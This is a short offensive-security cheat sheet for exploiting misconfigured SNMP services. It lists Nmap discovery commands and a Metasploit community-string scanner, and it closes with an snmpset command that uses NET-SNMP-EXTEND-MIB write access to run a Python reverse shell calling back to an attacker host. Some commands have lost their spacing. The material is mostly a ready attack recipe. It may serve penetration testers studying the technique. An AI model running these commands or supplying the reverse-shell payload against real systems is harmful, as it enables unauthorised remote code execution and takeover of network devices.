The SNMP protocol provides a way for devices on a network to share information with one another. As an attacker, we can sometimes leverage a misconfigured SNMP service to obtain detailed information about the system and/or execute arbitrary code.
Exploitation
Identifying SNMP on a Network
# Identify SNMP utilizing Nmapnmap-sU-p161 $hosts # Identify SNMP and retrieve server type / operating system with Nmapnmap-sU-p161 $hosts --script=snmp-sysdescr
Identifying Default Community Strings
# Identify Default Community Strings with Metasploitauxiliary/scanner/snmp/snmp_login
Exploiting SNMP with Write Access
snmpset-m+NET-SNMP-EXTEND-MIB-v2c-cprivate $targetip \ 'nsExtendStatus."evil"'=createAndGo \'nsExtendCommand."evil"'=/usr/bin/python \ 'nsExtendArgs."evil"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$ip\",$port));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
